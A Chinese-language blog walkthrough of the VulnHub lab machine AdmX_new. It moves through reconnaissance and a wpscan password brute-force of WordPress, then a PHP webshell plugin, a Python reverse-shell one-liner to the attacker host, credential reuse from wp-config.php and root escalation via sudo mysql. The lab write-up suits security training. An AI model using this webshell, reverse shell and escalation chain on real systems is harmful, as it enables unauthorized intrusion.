靶机: AdmX_new
靶机: AdmX_new
准备阶段
-
靶机:https://download.vulnhub.com/admx/AdmX_new.7z
-
下载后进行 MD5:2948034da23a8acc1285fd40ffcde827 校验,校验目的是确认下载文件有没有损坏或者存在问题
- cmd 进行校验:
certutil -hashfile 文件路径 MD5
- powershell 进行校验:
Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- cmd 进行校验:
-
使用 VirtualBox
-
网络 Host-Only
-
-
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
特殊说明: AdmX_new 内部网络存在一定问题需要调整
本次靶机为 Ubuntu-20.4
-
Ubuntu 网络配置变化
net-tools
-->iproute2
ifup/down
命令系的/etc/network/interfaces
弃用,转为netplan
命令和基于/etc/netplan/*.yaml
的配置文件
关于 netplan 具体情况:https://netplan.io/reference
-
靶机网络配置调和【请进行快照后进行下列操作】
-
在靶机开启过程中【还是黑屏状态,过渡 VirtualBox 动画时】长按
Shift
进入 Grub 引导界面 -
用上下键移到第二行的恢复模式,按
e
-
ro recovery nomodeset ...
将其改为rw single init=/bin/bash
当然ro recovery nomodeset ...
这段后可能会不同,用省略表示一直到行末 -
修改后使用 Ctrl + X 进入单用户模式,如果不是特别明白可以百度【核心目的是通过单用户模式直接以 root 进入靶机】
-
使用
ip a
查看网络状态,找到有问题的网卡名称,我的是enp0s17
不熟悉建议先学习 linux 网卡相关内容 -
修改网络配置
vim /etc/netplan/*.yaml
在/etc/netplan/
下的 yaml 配置文件应该只有一个,我们目标就是它# This file describes the network interfaces available on your system # For more information, see netplan(5). network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true enp0s17: addresses: [192.168.56.200/24] gateway4: 192.168.56.1 nameservers: addresses: [192.168.56.100] ethernets
下是重点,有两个网卡enp0s3
是默认不用管,添加的enp0s17
是我们之前查看的问题网卡名称enp0s17
下addresses
是我们直接静态分配的 IPgateway4
是网关nameservers
下的addresses
是 DHCP 服务地址
-
其中网关和 DHCP 服务地址是 VirtualBox 的 管理 --> 主机虚拟网络管理器 --> 你为靶机在 Host-Only 下使用的那一张网卡,上面有网卡和 DHCP 服务器信息
-
配置完成 yaml 配置文件后使用命令
netplan apply
使配置生效
-
-
关于 Ubuntu-20.4 网络配置详解: https://ubuntu.com/server/docs/network-configuration
打靶流程
发现目标
使用 arp-scan
进行,发现目标 192.168.56.200
┌──(kali㉿kali)-[~] └─$ sudo arp-scan -l -I eth1 Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111 Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered) 192.168.56.100 08:00:27:53:45:e0 PCS Systemtechnik GmbH 192.168.56.200 08:00:27:a3:25:25 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
- 使用
-I
参数指定靶机对接的网络是 eth1 需要指定扫描的接口 使用--interface=
参数,此参数简写I
使用 nmap
进行端口扫描,目标靶机的 80
端口是开放的,并且服务是 Apache httpd 2.4.41 的 http 服务
┌──(kali㉿kali)-[~] └─$ nmap -A -T4 192.168.56.200 Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST Nmap scan report for 192.168.56.200 Host is up (0.0014s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
-A
参数是用来进行操作系统及其版本的探测-T4
参数是可以加快执行速度
探查靶机 http 服务
使用浏览器对 http://192.168.56.200:80/
进行访问,会发现它只是一个 Apache httpd 2.4.41 的初始化页面,对此我们应该对 http://192.168.56.200:80/
爬取是否存在隐藏或未知页面,对此我们使用 dirsearch
进行暴力破解网络服务器中的目录和文件
┌──(kali㉿kali)-[~] └─$ dirsearch --url=192.168.56.200:80/ _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log Target: http://192.168.56.200:80/ [19:42:33] Starting: [19:42:37] 403 - 279B - /.htaccess_orig [19:42:37] 403 - 279B - /.htaccess.sample [19:42:37] 403 - 279B - /.htaccess_extra [19:42:37] 403 - 279B - /.ht_wsr.txt [19:42:37] 403 - 279B - /.htaccess.orig [19:42:37] 403 - 279B - /.htaccessBAK [19:42:37] 403 - 279B - /.htaccess_sc [19:42:37] 403 - 279B - /.htaccessOLD [19:42:37] 403 - 279B - /.htaccess.bak1 [19:42:37] 403 - 279B - /.htaccess.save [19:42:37] 403 - 279B - /.html [19:42:37] 403 - 279B - /.htm [19:42:37] 403 - 279B - /.htpasswd_test [19:42:37] 403 - 279B - /.htpasswds [19:42:37] 403 - 279B - /.htaccessOLD2 [19:42:37] 403 - 279B - /.httr-oauth [19:42:39] 403 - 279B - /.php [19:43:33] 200 - 11KB - /index.html [19:44:05] 403 - 279B - /server-status/ [19:44:05] 403 - 279B - /server-status [19:44:18] 403 - 279B - /tools/ [19:44:18] 301 - 316B - /tools -> http://192.168.56.200/tools/ [19:44:28] 200 - 7KB - /wordpress/wp-login.php [19:44:28] 200 - 8KB - /wordpress/ Task Completed
-
发现活跃目标 200
http://192.168.56.200:80/index.html
http://192.168.56.200:80/wordpress/wp-login.php
http://192.168.56.200:80/wordpress
-
和一个特别的 301
http://192.168.56.200:80/tools
使用火狐访问 http://192.168.56.200:80/wordpress/
发现加载时间过长,且明显有缺失,通过查看源码我们可以发现是,html 页面中存在错误指向 192.168.159.145
对此需要使用重定向或替换响应内容,下面使用方法
-
使用 Burp Suite 进行抓包修改响应实现
-
使用 浏览器插件 Redirector 重定向实现
对了此方法可以解决 googleapis 问题,是在访问外国的网站很多技术类网站还在使用 Google Apis 的服务,用过体验应该能发现那些网站存在部分缺失,原因就是国内无法访问 Google Apis 的服务,但是国内存在镜像站,通过此插件重定向就可以间接访问
-
使用 Mitmproxy 实现
我们使用 Mitmproxy 实现进行实现
- 确定你的 Kali 否安装 Mitmproxy
- 命令
mitmproxy
启动,程序 - 按
ctrl + shift + d
可以将 shell 伪终端上下分屏,上方是 Mitmproxy 的 TUI 界面,下方是 Bash 的 CLI 界面,此操作仅是方便你操作,如果知道请忽略 - 在 Mitmproxy 中使用
:
键可以进入指令模式,使用set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/'
即可完成重定向 - 在 firefox 中使用代理:
手动代理 --> HTTP 代理
代理 IP 地址127.0.0.1:8080
- 再次访问
http://192.168.56.200:80/wordpress/
经过一番探索,发现并没有什么特别的,我们使用 dirsearch 对 http://192.168.56.200:80/wordpress/
进行爆破
┌──(kali㉿kali)-[~/.mitmproxy] └─$ dirsearch --url=192.168.56.200:80/wordpress _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log Target: http://192.168.56.200:80/wordpress/ [12:33:30] Starting: [12:33:40] 403 - 279B - /wordpress/.ht_wsr.txt [12:33:41] 403 - 279B - /wordpress/.htaccess.sample [12:33:41] 403 - 279B - /wordpress/.htaccess.orig [12:33:41] 403 - 279B - /wordpress/.htaccess.bak1 [12:33:41] 403 - 279B - /wordpress/.htaccess_extra [12:33:41] 403 - 279B - /wordpress/.htaccess.save [12:33:41] 403 - 279B - /wordpress/.htaccess_orig [12:33:41] 403 - 279B - /wordpress/.htaccessOLD [12:33:41] 403 - 279B - /wordpress/.htaccess_sc [12:33:41] 403 - 279B - /wordpress/.htaccessOLD2 [12:33:41] 403 - 279B - /wordpress/.htaccessBAK [12:33:41] 403 - 279B - /wordpress/.htm [12:33:41] 403 - 279B - /wordpress/.httr-oauth [12:33:41] 403 - 279B - /wordpress/.htpasswd_test [12:33:41] 403 - 279B - /wordpress/.htpasswds [12:33:41] 403 - 279B - /wordpress/.html [12:33:46] 403 - 279B - /wordpress/.php [12:33:55] 301 - 0B - /wordpress/0 -> http://192.168.56.200/wordpress/0/ [12:34:05] 301 - 0B - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js [12:34:09] 301 - 0B - /wordpress/New%20folder%20(2) -> http://192.168.56.200/wordpress/New%20folder%20(2 [12:34:09] 301 - 0B - /wordpress/PMA2/index.php -> http://192.168.56.200/wordpress/PMA2/ [12:34:10] 301 - 0B - /wordpress/PMA/index.php -> http://192.168.56.200/wordpress/PMA/ [12:34:28] 301 - 0B - /wordpress/adm/index.php -> http://192.168.56.200/wordpress/adm/ [12:34:29] 302 - 0B - /wordpress/admin -> http://192.168.159.145/wordpress/wp-admin/ [12:34:30] 301 - 0B - /wordpress/admin. -> http://192.168.56.200/wordpress/admin [12:34:31] 302 - 0B - /wordpress/admin/ -> http://192.168.159.145/wordpress/wp-admin/ [12:34:32] 301 - 0B - /wordpress/admin/index.php -> http://192.168.56.200/wordpress/admin/ [12:34:33] 301 - 0B - /wordpress/admin/mysql/index.php -> http://192.168.56.200/wordpress/admin/mysql/ [12:34:33] 301 - 0B - /wordpress/admin/mysql2/index.php -> http://192.168.56.200/wordpress/admin/mysql2/ ... ... ... ... ... ... [12:38:02] 301 - 0B - /wordpress/wp-register.php -> http://192.168.159.145/wordpress/wp-login.php?action=register [12:38:02] 200 - 630B - /wordpress/wp-json/wp/v2/users/ [12:38:02] 200 - 96KB - /wordpress/wp-json/ [12:38:02] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.159.145/wordpress/wp-login.php?action=register [12:38:02] 200 - 49KB - /wordpress/wp-includes/ [12:38:02] 301 - 0B - /wordpress/www/phpMyAdmin/index.php -> http://192.168.56.200/wordpress/www/phpMyAdmin/ [12:38:03] 301 - 0B - /wordpress/xampp/phpmyadmin/index.php -> http://192.168.56.200/wordpress/xampp/phpmyadmin/ [12:38:03] 405 - 42B - /wordpress/xmlrpc.php
- 显然这次大发现,重点关注
200
、301
状态的内容 - 在此处需要对 WordPress 有一定了解,才能快速反应出应该重点盘查那些内容
- 重点是
/wordpress/wp-login.php
的登录界面,登录的是后台管理
此处我们使用针对 WordPress 的工具 wpscan
攻击 http://192.168.56.200/wordpress/
注意使用 wpscan
需要挂代理
──(kali㉿kali)-[~/workspace] └─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080 1 ⨯ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.56.200/wordpress/ [192.168.56.200] [+] Started: Tue Nov 1 20:20:27 2022 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.56.200/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15). | Found By: Emoji Settings (Passive Detection) | - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Tue Nov 1 20:20:46 2022 [+] Requests Done: 164 [+] Cached Requests: 4 [+] Data Sent: 53.828 KB [+] Data Received: 106.023 KB [+] Memory used: 193.719 MB [+] Elapsed time: 00:00:19
- 挂代理是因为之前服务器重定向原因
- 我们发现 WordPress 版本是 version 5.7.1
测试 wpscan 能正常工作后,使用如下命令工具 wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
爆破 WordPress 后台密码
┌──(kali㉿kali)-[~/workspace] └─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [proxychains] Strict chain ... 127.0.0.1:8080 ... 192.168.56.200:80 ... OK [+] URL: http://192.168.56.200/wordpress/ [192.168.56.200] [+] Started: Tue Nov 1 18:41:55 2022 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.56.200/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15). | Found By: Emoji Settings (Passive Detection) | - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04 [i] No Config Backups Found. [SUCCESS] - admin / adam14 Trying admin / Adm123 Time: 00:00:01 <==== > (20 / 236) 8.47% ETA: ??:??:?? [!] Valid Combinations Found: | Username: admin, Password: adam14 [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Tue Nov 1 18:42:07 2022 [+] Requests Done: 160 [+] Cached Requests: 30 [+] Data Sent: 49.889 KB [+] Data Received: 61.955 KB [+] Memory used: 204.188 MB [+] Elapsed time: 00:00:12
-
解析命令
proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin
- proxychains 是代理,这个应该理解
-P
参数是爆破密码字典,./password.txt
是密码字典-U
参数是爆破账号,我们指定用户为admin
毕竟我们要管理权
-
通过爆破发现关键内容密码为
adam14
[!] Valid Combinations Found: | Username: admin, Password: adam14
对于密码字典
- 建议通过网络查找 高质量弱密码字典
- 使用字典生成工具
john
,hydra
,crunch
手动生成 字典量级都比较大- 或 Kali 的自带字典【一般有点差强人意】
上面的爆破流程也可以使用 john
, hydra
进行但更佳复杂,使用 wpscan 是针对性攻击,对于渗透时根据目标类型使用针对性的攻击能够更高效
对 WordPress 后台页面攻击方法
目前已知 WordPress 版本是 version 5.7.1 且我们进入其后台管理界面
- media 标签 上传木马
- Appearance -> Theme Editor 标签 404 模板页面注入
- 基于 WordPress 插件攻击
在此我们选择 WordPress 插件攻击,因为操作空间更灵活一些
-
编写插件,并上传安装到 WordPress 激活
<?php /* Plugin Name: WebShell Plugin URI: https://yunju.blog.csdn.net/ Description: mu Author: myname Version: 1.0 Author URI: https://yunju.blog.csdn.net/ */ if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?> ?> -
在浏览器访问
http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id
测试 -
在本地开启对映监听
netcat -nvlp 4444
-
经过测试上面存在
python3
-
尝试使用 Python 反弹 shell
import os,subprocess,socket # 创建套接字 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议 # 创建通信 s.connect(('192.168.56.111', 4444)) # 重定向,保障通信的输入与输出 os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) # 生成反弹的 shell p=subprocess.call(["/bin/sh","-i"]) # 使用时压缩上面的代码,以便 exec() 执行 import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); 构建
python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-
替代
id
进行执行
也可以使用 metasploit-framework 进行攻击
┌──(kali㉿kali)-[~/workspace] └─$ netcat -nlvp 4444 1 ⨯ listening on [any] 4444 ... connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466 bash: cannot set terminal process group (990): Inappropriate ioctl for device bash: no job control in this shell www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$
提权
先确定系统信息,使用命令 uname -a
www-data@wp:/var/www/html/wordpress$ uname -a uname -a Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
既然攻击 WordPress
一定不要忘记查看其配置文件 wp-config.php
www-data@wp:/var/www/html/wordpress$ cat wp-config.php cat wp-config.php <?php define( 'DB_NAME', 'wordpress' ); define( 'DB_USER', 'admin' ); define( 'DB_PASSWORD', 'Wp_Admin#123' ); define( 'DB_HOST', 'localhost' ); define( 'DB_CHARSET', 'utf8mb4' ); define( 'DB_COLLATE', '' ); define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' ); define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' ); define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' ); define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' ); define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' ); define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' ); define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' ); define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' ); $table_prefix = 'wp_'; define( 'WP_DEBUG', false ); if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); }
- 可以直接知道 MySQL 用户
admin
和密码Wp_Admin#123
- 但登录会错误
我们还可以在用户目录查看 ls /home
发现一个用户 wpadmin
我们可以尝试猜测密码之前的 adam14
- 能登录,之后我们可以去
cd ~
找到第一个 flag
wpadmin@wp:~$ cd ~ && ls cd ~ && ls local.txt wpadmin@wp:~$ cat local.txt cat local.txt 153495edec1b606c24947b1335998bd9
二次提权
在对 sudo -l
验证时发现,可以无条件执行 /usr/bin/mysql -u root -D wordpress -p
wpadmin@wp:~$ sudo -l sudo -l Matching Defaults entries for wpadmin on wp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wpadmin may run the following commands on wp: (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
- 密码猜测依旧是
adam14
- 进入 mysql 中使用
system
即可执行 root 级命令 - 在
\! /bin/bash
即可使用 root 的 bash
在 root 用户目录下 proof.txt
最后一个 flag 到此打靶就结束了
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 【.NET】调用本地 Deepseek 模型
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· DeepSeek “源神”启动!「GitHub 热点速览」
· 我与微信审核的“相爱相杀”看个人小程序副业
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库